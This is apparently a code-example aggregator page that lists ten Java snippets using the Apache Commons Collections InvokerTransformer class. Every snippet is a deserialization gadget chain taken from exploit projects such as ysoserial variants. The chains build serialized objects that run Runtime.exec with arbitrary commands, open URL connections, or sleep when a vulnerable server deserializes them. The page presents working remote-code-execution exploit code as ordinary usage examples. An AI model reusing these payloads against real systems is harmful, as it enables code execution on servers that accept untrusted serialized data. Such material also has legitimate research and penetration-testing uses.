This article collects typical usage examples of the Java class org.apache.commons.collections.functors.InvokerTransformer. If you are looking for how the InvokerTransformer class is used in practice, the selected code examples here may help.
The InvokerTransformer class belongs to the org.apache.commons.collections.functors package. Ten code examples of the class are shown below, sorted by popularity by default.
Example 1: Reverse_Payload
import org.apache.commons.collections.functors.InvokerTransformer; // import the required package/class
public static Object Reverse_Payload() throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}),
new InvokerTransformer("exec", new Class[]{String.class},
new Object[]{"calc.exe"})};
Transformer transformerChain = new ChainedTransformer(transformers);
Map pocMap = new HashMap();
pocMap.put("value", "value");
Map outmap = TransformedMap.decorate(pocMap, null, transformerChain);
// Obtain the AnnotationInvocationHandler class object via reflection
Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
// Obtain the constructor of cls via reflection
Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);
// Accessible must be set to true here, otherwise serialization fails
ctor.setAccessible(true);
// Instantiate the object via newInstance()
Object instance = ctor.newInstance(Retention.class, outmap);
return instance;
}
Developer: yrzx404, project: interview-question-code, lines of code: 25, source: App.java
Example 2: getObject
import org.apache.commons.collections.functors.InvokerTransformer; // import the required package/class
public BadAttributeValueExpException getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
Field valfield = val.getClass().getDeclaredField("val");
valfield.setAccessible(true);
valfield.set(val, entry);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return val;
}
Developer: hucheat, project: APacheSynapseSimplePOC, lines of code: 34, source: CommonsCollections5.java
Example 3: getObject
import org.apache.commons.collections.functors.InvokerTransformer; // import the required package/class
public InvocationHandler getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return handler;
}
Developer: hucheat, project: APacheSynapseSimplePOC, lines of code: 31, source: CommonsCollections1.java
Example 4: main
import org.apache.commons.collections.functors.InvokerTransformer; // import the required package/class
@SuppressWarnings ( {"unchecked"} )
public static void main(String[] args)
throws ClassNotFoundException, NoSuchMethodException, InstantiationException,
IllegalAccessException, IllegalArgumentException, InvocationTargetException {
String cmd[] = {"/bin/sh", "-c", "touch /tmp/h2hc_lazymap"}; // Command to be executed
Transformer[] transformers = new Transformer[] {
// returns Class Runtime.class
new ConstantTransformer(Runtime.class),
// 1st InvokerTransformer object: .getMethod("getRuntime", new Class[0])
new InvokerTransformer(
"getMethod", // invokes method getMethod
( new Class[] {String.class, Class[].class } ),// parameter types: (String, Class[])
( new Object[] {"getRuntime", new Class[0] } ) // parameters: (getRuntime, Class[0])
),
// 2nd InvokerTransformer object: .invoke(null, new Object[0])
new InvokerTransformer(
"invoke", // invokes method: invoke
(new Class[] {Object.class, Object[].class }),// parameter types: (Object.class, Object[])
(new Object[] {null, new Object[0] }) // parameters: (null, new Object[0])
),
// 3rd InvokerTransformer object: .exec(cmd[])
new InvokerTransformer(
"exec", // invokes method: exec
new Class[] { String[].class }, // parameter types: (String[])
new Object[]{ cmd } ) // parameters: (cmd[])
};
// Creates the ChainedTransformer object with the array of Transformers:
Transformer transformerChain = new ChainedTransformer(transformers);
// Creates the map
Map map = new HashMap();
// Decorates the map with LazyMap, using the transformer chain as the factory
Map lazyMap = LazyMap.decorate(map,transformerChain);
lazyMap.get("h2hc2"); // Tries to retrieve a nonexistent key (BOOM)
}
Developer: joaomatosf, project: JavaDeserH2HC, lines of code: 40, source: ExampleTransformersWithLazyMap.java
Example 5: getObject
import org.apache.commons.collections.functors.InvokerTransformer; // import the required package/class
public BadAttributeValueExpException getObject(CmdExecuteHelper cmdHelper) throws Exception {
final String[] execArgs = cmdHelper.getCommandArray();
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String[].class }, new Object[]{execArgs}),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
Field valfield = val.getClass().getDeclaredField("val");
valfield.setAccessible(true);
valfield.set(val, entry);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return val;
}
Developer: pimps, project: ysoserial-modified, lines of code: 35, source: CommonsCollections5.java
Example 6: getObject
import org.apache.commons.collections.functors.InvokerTransformer; // import the required package/class
public InvocationHandler getObject(CmdExecuteHelper cmdHelper) throws Exception {
final String[] execArgs = cmdHelper.getCommandArray();
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String[].class }, new Object[]{execArgs}),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return handler;
}
Developer: pimps, project: ysoserial-modified, lines of code: 32, source: CommonsCollections1.java
Example 7: getObject
import org.apache.commons.collections.functors.InvokerTransformer; // import the required package/class
public InvocationHandler getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return handler;
}
Developer: NetSPI, project: JavaSerialKiller, lines of code: 31, source: CommonsCollections1.java
Example 8: getObject
import org.apache.commons.collections.functors.InvokerTransformer; // import the required package/class
public InvocationHandler getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return handler;
}
Developer: njfox, project: Java-Deserialization-Exploit, lines of code: 31, source: CommonsCollections1.java
Example 9: main
import org.apache.commons.collections.functors.InvokerTransformer; // import the required package/class
@SuppressWarnings ( {"unchecked"} )
public static void main(String[] args)
throws ClassNotFoundException, NoSuchMethodException, InstantiationException,
IllegalAccessException, IllegalArgumentException, InvocationTargetException, IOException {
String url = args[0];
// Creates the array of transformers that results in the following construction:
// new URL(url).openConnection().getInputStream().read();
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(new URL(url)),
new InvokerTransformer("openConnection", new Class[] { }, new Object[] {}),
new InvokerTransformer("getInputStream", new Class[] { }, new Object[] {}),
new InvokerTransformer("read", new Class[] {}, new Object[] {})
};
// Creates the ChainedTransformer object with the array of Transformers:
Transformer transformerChain = new ChainedTransformer(transformers);
// Creates the map
Map map = new HashMap();
// Decorates the map with LazyMap, using the transformer chain as the factory
Map lazyMap = LazyMap.decorate(map,transformerChain);
// Uses reflection to obtain a reference to the AnnotationInvocationHandler class
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
// Obtains the AnnotationInvocationHandler constructor that takes a type (class) and a Map
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
// Makes the constructor accessible
ctor.setAccessible(true);
// Obtains/creates an instance of AnnotationInvocationHandler, supplying (via the constructor) a Retention.class (which is
// an Annotation type, required by the constructor) and assigns the LazyMap (containing the Transformer chain) to the
// memberValues field. Thus, when a nonexistent key is looked up in this field, the chain will be "executed"!
InvocationHandler handlerLazyMap = (InvocationHandler) ctor.newInstance(Retention.class, lazyMap);
// creates the Map interface array
Class[] interfaces = new Class[] {java.util.Map.class};
// creates the Proxy "between" the Map interface and the previous AnnotationInvocationHandler (which contains the LazyMap + transformers)
Map proxyMap = (Map) Proxy.newProxyInstance(null, interfaces, handlerLazyMap);
// creates another AnnotationInvocationHandler and assigns the Proxy to the memberValues field;
// this Proxy will be "triggered" in the magic method readObject and will thus divert the flow to the
// invoke() method of the first AnnotationInvocationHandler created (which contains the LazyMap + Transformers)
InvocationHandler handlerProxy = (InvocationHandler) ctor.newInstance(Retention.class, proxyMap);
// Serializes the "handlerProxy" object and saves it to a file. On deserialization,
// readObject will call map.entrySet() and thus divert the flow to invoke().
// In invoke(), a nonexistent key will be looked up in the "memberValues" field (which contains a LazyMap
// with the Transformer chain), which should trigger the Thread.sleep(10000)!
System.out.println("Saving serialized object in SleepExample.ser");
FileOutputStream fos = new FileOutputStream("SleepExample.ser");
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(handlerProxy);
oos.flush();
}
Developer: joaomatosf, project: JavaDeserH2HC, lines of code: 55, source: DnsWithCommonsCollections.java
Example 10: main
import org.apache.commons.collections.functors.InvokerTransformer; // import the required package/class
@SuppressWarnings ( {"unchecked"} )
public static void main(String[] args)
throws ClassNotFoundException, NoSuchMethodException, InstantiationException,
IllegalAccessException, IllegalArgumentException, InvocationTargetException, IOException {
// Creates the array of Transformers that results in the following construction:
//Thread.class.getMethod("sleep", new Class[]{Long.TYPE}).invoke(null, new Object[]{10000L});
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Thread.class), // returns class Thread.class
// 1st InvokerTransformer object: getMethod("sleep", new Class[]{Long.TYPE})
new InvokerTransformer(
"getMethod", // invokes method getMethod
( new Class[] {String.class, Class[].class } ), // parameter types: (String, Class[])
( new Object[] {"sleep", new Class[]{Long.TYPE} } ) // parameters: (sleep, new Class[]{Long.TYPE})
),
// 2nd InvokerTransformer object: invoke(null, new Object[]{10000L})
new InvokerTransformer(
"invoke", // invokes method: invoke
(new Class[] {Object.class, Object[].class }),// parameter types: (Object.class, Object[])
(new Object[] {null, new Object[] {10000L} }) // parameters: (null, new Object[] {10000L})
)
};
// Creates the ChainedTransformer object with the array of Transformers:
Transformer transformerChain = new ChainedTransformer(transformers);
// Creates the map
Map map = new HashMap();
// Decorates the map with LazyMap, using the transformer chain as the factory
Map lazyMap = LazyMap.decorate(map,transformerChain);
// Uses reflection to obtain a reference to the AnnotationInvocationHandler class
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
// Obtains the AnnotationInvocationHandler constructor that takes a type (class) and a Map
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
// Makes the constructor accessible
ctor.setAccessible(true);
// Obtains/creates an instance of AnnotationInvocationHandler, supplying (via the constructor) a Retention.class (which is
// an Annotation type, required by the constructor) and assigns the LazyMap (containing the Transformer chain) to the
// memberValues field. Thus, when a nonexistent key is looked up in this field, the chain will be "executed"!
InvocationHandler handlerLazyMap = (InvocationHandler) ctor.newInstance(Retention.class, lazyMap);
// creates the Map interface array
Class[] interfaces = new Class[] {java.util.Map.class};
// creates the Proxy "between" the Map interface and the previous AnnotationInvocationHandler (which contains the LazyMap + transformers)
Map proxyMap = (Map) Proxy.newProxyInstance(null, interfaces, handlerLazyMap);
// creates another AnnotationInvocationHandler and assigns the Proxy to the memberValues field;
// this Proxy will be "triggered" in the magic method readObject and will thus divert the flow to the
// invoke() method of the first AnnotationInvocationHandler created (which contains the LazyMap + Transformers)
InvocationHandler handlerProxy = (InvocationHandler) ctor.newInstance(Retention.class, proxyMap);
// Serializes the "handlerProxy" object and saves it to a file. On deserialization,
// readObject will call map.entrySet() and thus divert the flow to invoke().
// In invoke(), a nonexistent key will be looked up in the "memberValues" field (which contains a LazyMap
// with the Transformer chain), which should trigger the Thread.sleep(10000)!
System.out.println("Saving serialized object in SleepExample.ser");
FileOutputStream fos = new FileOutputStream("SleepExample.ser");
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(handlerProxy);
oos.flush();
}
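Developer: joaomatosf, project: JavaDeserH2HC, lines of code: 63, source: SleepExample.java
Note: The org.apache.commons.collections.functors.InvokerTransformer class examples in this article were collected from source-code and documentation hosting platforms such as GitHub and MSDocs. The code snippets were selected from open-source projects contributed by their developers, and copyright of the source code belongs to the original authors. For distribution and use, refer to the License of the corresponding project. Do not reproduce without permission.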